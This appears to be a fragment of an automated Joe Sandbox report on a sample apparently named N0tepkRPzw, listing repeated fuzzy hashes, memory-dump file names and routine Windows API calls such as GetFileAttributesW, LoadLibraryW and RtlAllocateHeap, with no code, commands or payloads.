              • Instruction ID: 7845a63ac9f2c5c2a81cfa7e32412ff187c55fac2c8aa3e5687da403ab606582
              • Opcode Fuzzy Hash: 2d1a010309e806c65199474cec398e6daa0403464d5dd821a4f82f44e380b5f9
              • Instruction Fuzzy Hash: 0FE092396903186BDF119F64DC41FE9775CEB08783F484065BC88C7160DF619D98ABB0
              APIs
              • GdiplusShutdown.GDIPLUS(?,?,?,?,00D81FA1,000000FF), ref: 00D6A3D1
              • OleUninitialize.OLE32(?,?,?,?,00D81FA1,000000FF), ref: 00D6A3D6
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: GdiplusShutdownUninitialize
              • String ID:
              • API String ID: 3856339756-0
              • Opcode ID: d5cf1712535e21d3fa1650d6d9c20ce581faba0912eecdcdd4aecef85cd7033b
              • Instruction ID: b2e49487ed64eff1832f1fb09674ce78ee2c49e374507c3dc40cb897f2687a6a
              • Opcode Fuzzy Hash: d5cf1712535e21d3fa1650d6d9c20ce581faba0912eecdcdd4aecef85cd7033b
              • Instruction Fuzzy Hash: 6AF01576618654EFC610AB4CDD05B19FBADFB89B20F04436AB419C3760CB7468118BA5
              APIs
              • GetFileAttributesW.KERNELBASE(?,?,?,00D5A189,?,00D576B2,?,?,?,?), ref: 00D5A1A5
              • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00D5A189,?,00D576B2,?,?,?,?), ref: 00D5A1D1
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AttributesFile
              • String ID:
              • API String ID: 3188754299-0
              • Opcode ID: 4f157e6e365f8cc530fe15fe6d6e2dca95e7b3b9ffacc376eb56c24eef414dc1
              • Instruction ID: 033bb52c54b04b465648dbf327cda55af573bafe89f8695f22ffd3fc8b07ebec
              • Opcode Fuzzy Hash: 4f157e6e365f8cc530fe15fe6d6e2dca95e7b3b9ffacc376eb56c24eef414dc1
              • Instruction Fuzzy Hash: 50E06D359002285BCB20AA689C05BD9B758EB087A2F0442A2BD5AE3290D6709D489BF1
              APIs
              • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D600A0
              • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D5EB86,Crypt32.dll,00000000,00D5EC0A,?,?,00D5EBEC,?,?,?), ref: 00D600C2
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: DirectoryLibraryLoadSystem
              • String ID:
              • API String ID: 1175261203-0
              • Opcode ID: e339455c195136a2ff76f7d5626da4c44aa9113ccaab42a168d6b5bc1875f765
              • Instruction ID: 653a41dfa7c1b7bd4e23ce782b5dd1adb3b874903a13c45ab82c15aea3e89444
              • Opcode Fuzzy Hash: e339455c195136a2ff76f7d5626da4c44aa9113ccaab42a168d6b5bc1875f765
              • Instruction Fuzzy Hash: 6EE0127691125C6BDB219AA49C05FD6776CEF09792F0400A6B948D3144DA749A448FB0
              APIs
              • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00D69B30
              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00D69B37
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: BitmapCreateFromGdipStream
              • String ID:
              • API String ID: 1918208029-0
              • Opcode ID: ed21fa345294753f039825004970c6cab0042040dbb23d9e02c1bdc8d4ea712f
              • Instruction ID: ddaafe7c2a653c49a7f1e22f19613ee01ea8b289cd9084db30a9ec8a49f466d3
              • Opcode Fuzzy Hash: ed21fa345294753f039825004970c6cab0042040dbb23d9e02c1bdc8d4ea712f
              • Instruction Fuzzy Hash: 1EE0ED75901218EFCB10DF98D541699B7ECEB08721F10815BE89597301E6B1AE049BB5
              APIs
                • Part of subcall function 00D7329A: try_get_function.LIBVCRUNTIME ref: 00D732AF
              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D7217A
              • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00D72185
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
              • String ID:
              • API String ID: 806969131-0
              • Opcode ID: 6ea62d2d9b3787f47c4168b1f7595dd0b9221eabcf4f7179028bbd01652ee996
              • Instruction ID: fc9a46047e55d898437a43156a95d98971ae8ff00090203dc1946468830f28e8
              • Opcode Fuzzy Hash: 6ea62d2d9b3787f47c4168b1f7595dd0b9221eabcf4f7179028bbd01652ee996
              • Instruction Fuzzy Hash: C3D0A928204392282A5827B028930B82344F962BB03E0CA46EA28CA2D2FE108008B131
              APIs
              • DloadLock.DELAYIMP ref: 00D6DC73
              • DloadProtectSection.DELAYIMP ref: 00D6DC8F
                • Part of subcall function 00D6DE67: DloadObtainSection.DELAYIMP ref: 00D6DE77
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: Dload$Section$LockObtainProtect
              • String ID:
              • API String ID: 731663317-0
              • Opcode ID: 1156c30e232aecb36ad7bb0d93afbe40f507c8c00f23772caa7c474d8c4f79d6
              • Instruction ID: a9d722b2143a8b0780d0deeb5470ae915893b86b6bf2fef2e2c1fc5b214937c9
              • Opcode Fuzzy Hash: 1156c30e232aecb36ad7bb0d93afbe40f507c8c00f23772caa7c474d8c4f79d6
              • Instruction Fuzzy Hash: 55D0C970F40344CFC251AF14B94675D3AB2F718744FA80641F246CA6A9DBA594C0C635
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: ItemShowWindow
              • String ID:
              • API String ID: 3351165006-0
              • Opcode ID: c11f8145ce612b053bb4faee00ebd1b6d3a7f5ebddb3849a8284210517fcceed
              • Instruction ID: 01cf2f9a65faa7bad79904f7209b98d6a1c1bd80be07eca08262a6eaaaa1ce77
              • Opcode Fuzzy Hash: c11f8145ce612b053bb4faee00ebd1b6d3a7f5ebddb3849a8284210517fcceed
              • Instruction Fuzzy Hash: 05C01233058300FECB020BB4DC09D3FBBA8ABA4312F05CA08B2A5C0160C238C010DB21
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 08d344350a8fff4132392a224565502cc8d905ec28b628f0caa7ab950fb083e8
              • Instruction ID: ac2e58601c9de5e3553f2660455481519078a6d69e2fdcb28abe55f8ba6ed1b8
              • Opcode Fuzzy Hash: 08d344350a8fff4132392a224565502cc8d905ec28b628f0caa7ab950fb083e8
              • Instruction Fuzzy Hash: 4CC1BF38A042449FEF15CF68C484BB97BA5EF0A312F1C45BAEC45DB286DB319948CB71
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 952650fd5170ad3cdf50d7586339e02bee111cdb895e5999ffb76cfb045f4328
              • Instruction ID: 409b1094f44203b34d525c2b7d29c02e5bb6bdc264d5dcf2c64f41098a3596f4
              • Opcode Fuzzy Hash: 952650fd5170ad3cdf50d7586339e02bee111cdb895e5999ffb76cfb045f4328
              • Instruction Fuzzy Hash: 9F719A71504B449EDF25DB74CC51AEBB7E8EB14342F48496EEDAA47242DA31AA4CCF30
              APIs
              • __EH_prolog.LIBCMT ref: 00D58384
                • Part of subcall function 00D51380: __EH_prolog.LIBCMT ref: 00D51385
                • Part of subcall function 00D51380: new.LIBCMT ref: 00D513FE
                • Part of subcall function 00D519A6: __EH_prolog.LIBCMT ref: 00D519AB
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: c46fb5333bd0b32a816ecd43d92038ff6e7d8c67ace9b81560da3f22b42d19bb
              • Instruction ID: 78efb1ea48e2788df58413c65fad46e778095a3db02bc8439ef2e1e284f0b6bb
              • Opcode Fuzzy Hash: c46fb5333bd0b32a816ecd43d92038ff6e7d8c67ace9b81560da3f22b42d19bb
              • Instruction Fuzzy Hash: CD4192718446549AEF20EB60C855BEA73A9EF50301F0440EAED8AA7193DF745ACCEB70
              APIs
              • __EH_prolog.LIBCMT ref: 00D51E05
                • Part of subcall function 00D53B3D: __EH_prolog.LIBCMT ref: 00D53B42
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 6803428c7d62aa3249415c465d4bb5f1aa2bdec4fe440afc880617d7eacbb116
              • Instruction ID: 7f4cddf904d02d8ff2ff0fb7ae7850a9c98fe1c18662dfd2189d79abafec9826
              • Opcode Fuzzy Hash: 6803428c7d62aa3249415c465d4bb5f1aa2bdec4fe440afc880617d7eacbb116
              • Instruction Fuzzy Hash: 58212576904108AFCF25EF99D952AAEBBF6EF58300B14016DEC45A7251CB325A188B70
              APIs
              • __EH_prolog.LIBCMT ref: 00D6A7C8
                • Part of subcall function 00D51380: __EH_prolog.LIBCMT ref: 00D51385
                • Part of subcall function 00D51380: new.LIBCMT ref: 00D513FE
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 898c270ab364d8ca7919fe3468e39802ae233efa42db7346aff20e847025d45c
              • Instruction ID: 83bd6643da9f18ab234f62ad11557b3e37a3156de3bfb31a744738756451bae7
              • Opcode Fuzzy Hash: 898c270ab364d8ca7919fe3468e39802ae233efa42db7346aff20e847025d45c
              • Instruction Fuzzy Hash: AA213B75C04249ABCF15DF98C9529EEB7B4EF19300F1004AAE849B7242DB35AE0ADF71
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 6082de1155c5557a75f2bb51b08d6e97e88c983d60b5416c646b351f23be7c72
              • Instruction ID: 191cb7e7ba22f8a9e630a586f8e4ca541ef2e53a651e07a9da7052a573a47532
              • Opcode Fuzzy Hash: 6082de1155c5557a75f2bb51b08d6e97e88c983d60b5416c646b351f23be7c72
              • Instruction Fuzzy Hash: 67118E73E10528DBDF22AEA8CC619EEB736EF48752F044115FC14A7291DA358D1986B0
              APIs
                • Part of subcall function 00D785A9: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00D78FD3,00000001,00000364,?,00D73713,00000050,?,00D90EE8,00000200), ref: 00D785EA
              • _free.LIBCMT ref: 00D7BBF6
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AllocateHeap_free
              • String ID:
              • API String ID: 614378929-0
              • Opcode ID: aa7cfc08f8c271ce16935b528c62ef837d81ae20f42aba82ac1fb9d51323eae8
              • Instruction ID: f2cd9e0e44a9bb2a4b5c9b018ed50d4c0e32e6e5e791da755363029f0ca65ca2
              • Opcode Fuzzy Hash: aa7cfc08f8c271ce16935b528c62ef837d81ae20f42aba82ac1fb9d51323eae8
              • Instruction Fuzzy Hash: 4901D6722003096BE3218E699885A5AFBE9EB85370F29451EE59883280FB30A9058774
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
              • Instruction ID: 8e315b42fe657a7399988affbae872dcac34021a1069c5f1b72e748f21b7e378
              • Opcode Fuzzy Hash: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
              • Instruction Fuzzy Hash: A4F081305007299FDF30DA78C94161677D4EB25322F248B1BEC96C7680E770D888C772
              APIs
              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00D78FD3,00000001,00000364,?,00D73713,00000050,?,00D90EE8,00000200), ref: 00D785EA
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AllocateHeap
              • String ID:
              • API String ID: 1279760036-0
              • Opcode ID: a40070fcfb1ca55fa589e55545e8df9217799af47a8dfed5d22cde76f701c87f
              • Instruction ID: 626de325a34495acf3071a11d718afa3361407c3b70725e268f57c4e927d1e1f
              • Opcode Fuzzy Hash: a40070fcfb1ca55fa589e55545e8df9217799af47a8dfed5d22cde76f701c87f
              • Instruction Fuzzy Hash: 6EF0E9316C0222ABEB215E26DC0DB5B7788DF417A0B18C211AD1CEA180FE20DD016AF4
              APIs
              • __EH_prolog.LIBCMT ref: 00D55BDC
                • Part of subcall function 00D5B07D: __EH_prolog.LIBCMT ref: 00D5B082
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
